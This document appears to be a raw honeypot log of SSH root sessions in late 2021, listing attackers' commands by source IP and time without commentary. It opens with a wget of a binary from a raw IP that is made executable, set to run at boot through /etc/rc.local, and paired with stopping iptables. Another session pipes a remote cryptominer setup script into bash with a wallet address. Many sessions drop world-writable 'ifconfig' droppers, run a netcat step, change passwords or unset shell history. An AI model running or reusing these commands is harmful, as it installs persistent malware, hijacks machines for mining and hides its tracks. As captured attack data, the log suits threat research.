wget -c http://222.186.133.160:8090/cvv
chmod 777 cvv
./cvv
echo "cd /tmp/">>/etc/rc.local
echo "./cvv
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 129.227.219.28 29-Nov-2021 08:16:32 ssh2 root
w
lscpu
ls -a
id richard
halt

From 38.91.102.77 29-Nov-2021 09:35:55 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';nproc;curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
nproc
curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 2.56.59.114 29-Nov-2021 15:58:07 ssh2 root
Exec hive-passwd nqmashrabotatuk1234; pkill Xorg; pkill x11vnc; service shellinabox stop
hive-passwd nqmashrabotatuk1234
pkill Xorg
pkill x11vnc
service shellinabox stop

From 2.56.59.114 29-Nov-2021 18:59:01 ssh2 root
Exec hive-passwd nqmashrabotatuk123; pkill Xorg; pkill x11vnc; service shellinabox stop
hive-passwd nqmashrabotatuk123
pkill Xorg
pkill x11vnc
service shellinabox stop

From 5.253.235.118 30-Nov-2021 21:56:47 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.16.242 30-Nov-2021 22:03:15 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.16.242 30-Nov-2021 22:23:15 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 13.213.51.41 30-Nov-2021 22:25:16 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 193.8.4.40 30-Nov-2021 22:26:31 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 120.53.124.60 30-Nov-2021 22:29:12 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 13.213.51.41 30-Nov-2021 22:30:40 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 120.53.124.60 30-Nov-2021 22:31:12 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 120.53.124.60 30-Nov-2021 22:31:54 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 176.28.20.18 30-Nov-2021 22:34:09 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 101.34.187.167 30-Nov-2021 22:36:31 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 79.175.151.220 30-Nov-2021 22:51:00 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 101.34.17.83 30-Nov-2021 22:55:42 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 101.34.17.83 30-Nov-2021 22:56:47 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 101.34.17.83 30-Nov-2021 22:57:23 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 36.250.216.181 30-Nov-2021 23:25:35 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 163.197.0.2 30-Nov-2021 23:37:49 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 200.11.146.8 30-Nov-2021 23:39:55 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 200.11.146.8 30-Nov-2021 23:41:07 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 200.11.146.8 30-Nov-2021 23:45:09 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 150.107.95.20 30-Nov-2021 23:50:31 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 163.197.8.123 30-Nov-2021 23:50:46 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 148.3.253.73 1-Dec-2021 00:06:33 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 101.34.187.167 1-Dec-2021 00:12:41 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 101.34.187.167 1-Dec-2021 00:13:23 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 136.233.148.82 1-Dec-2021 00:17:02 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 49.232.149.173 1-Dec-2021 00:20:24 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 122.233.109.9 1-Dec-2021 00:23:51 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 13.213.51.41 1-Dec-2021 00:25:54 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 00:26:49 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec unset HISTFILE ; unset HISTSIZE
unset HISTFILE
unset HISTSIZE

From 167.99.241.156 1-Dec-2021 00:27:44 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 00:27:54 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 36.250.216.181 1-Dec-2021 00:28:03 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 212.129.136.88 1-Dec-2021 00:30:06 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 163.197.0.2 1-Dec-2021 00:32:49 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 51.77.58.15 1-Dec-2021 00:35:13 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 190.202.94.42 1-Dec-2021 00:35:23 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 51.77.58.15 1-Dec-2021 00:35:28 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 163.197.8.123 1-Dec-2021 00:46:03 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 163.197.8.123 1-Dec-2021 00:47:24 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 163.197.0.2 1-Dec-2021 00:48:05 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 136.233.148.82 1-Dec-2021 00:49:12 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 43.225.67.105 1-Dec-2021 00:50:16 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 3.70.171.168 1-Dec-2021 00:52:49 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 163.197.8.123 1-Dec-2021 00:53:28 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.8.123 1-Dec-2021 00:54:33 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 83.56.9.96 1-Dec-2021 00:55:17 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.8.123 1-Dec-2021 00:55:41 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 163.197.8.123 1-Dec-2021 00:56:19 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 163.197.24.62 1-Dec-2021 00:56:55 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 136.233.148.82 1-Dec-2021 00:57:32 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 163.197.8.123 1-Dec-2021 00:59:42 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 161.202.189.162 1-Dec-2021 01:01:30 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 01:02:15 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 01:02:59 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 163.197.24.62 1-Dec-2021 01:04:22 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 163.197.24.62 1-Dec-2021 01:06:39 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 163.197.8.123 1-Dec-2021 01:11:35 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 31.169.25.190 1-Dec-2021 01:13:06 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 122.233.107.9 1-Dec-2021 01:26:21 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 122.233.107.9 1-Dec-2021 01:28:17 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
